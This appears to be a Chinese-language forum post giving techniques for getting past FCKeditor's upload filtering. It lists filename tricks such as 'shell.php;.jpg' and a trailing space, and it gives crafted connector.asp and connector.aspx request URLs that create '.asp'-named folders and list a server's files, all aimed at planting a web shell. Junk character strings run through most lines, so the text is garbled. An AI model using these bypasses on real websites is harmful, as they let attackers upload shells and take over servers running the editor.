很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
; v, |5 _3 h5 a# k- k. w) ?, S) y# ~4 R" t% Y1 z- g' Q/ @7 ~) \
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。/ }) Q" y- O( ~8 j3 @( S
3 n0 K; w1 O1 p n! Q
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
3 j8 K; v2 C3 ~9 h$ O
7 E: J. `: ?6 x突破建立文件夹:6 S' Y" S! V) i/ H
2 i( O( B: q( X! w% e8 X3 Peditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp+ [* u3 I! N1 O) n
( M' m/ m, R- `/ E# ]! a P2 l3 p参数:
, t; |" z- ^5 L. W3 P1 V$ [
* n ?+ u& S9 T$ J当前目录名:CurrentFolder=/qing.asp
7 S# y5 Z7 o2 H0 k" M8 z/ x V# b! v" h
新的目录名:NewFolderName=x.asp- _3 u c# p3 b' ^
7 G) L, [0 E3 j% B其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
; Q/ [5 k% R" O: L
# B5 o2 ]; z: J- N3 A# s那么 x.asp 就已经建立生成了,此方法百试百灵!" O/ m* ^; w( }8 p& f9 ?, e
& U. [) ?* i# Y# x5 J4 C
新建文件夹参数 x.asp,基本都能搞定。$ [4 R# F, a, D& |( D( f
( d* p8 o% l. ^' g下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
" Z! B) f$ T0 ^
) n1 h1 @4 H s; f6 laspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp6 h, K, [, k% C* C, I2 m& p
1 N5 B) d# v) H2 E3 R获取文件列表
8 ~( T9 P0 ^, e% u6 y5 n aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F/ p6 P5 d- d% n' @+ E8 K W
. a2 F; K# R+ ?# U
|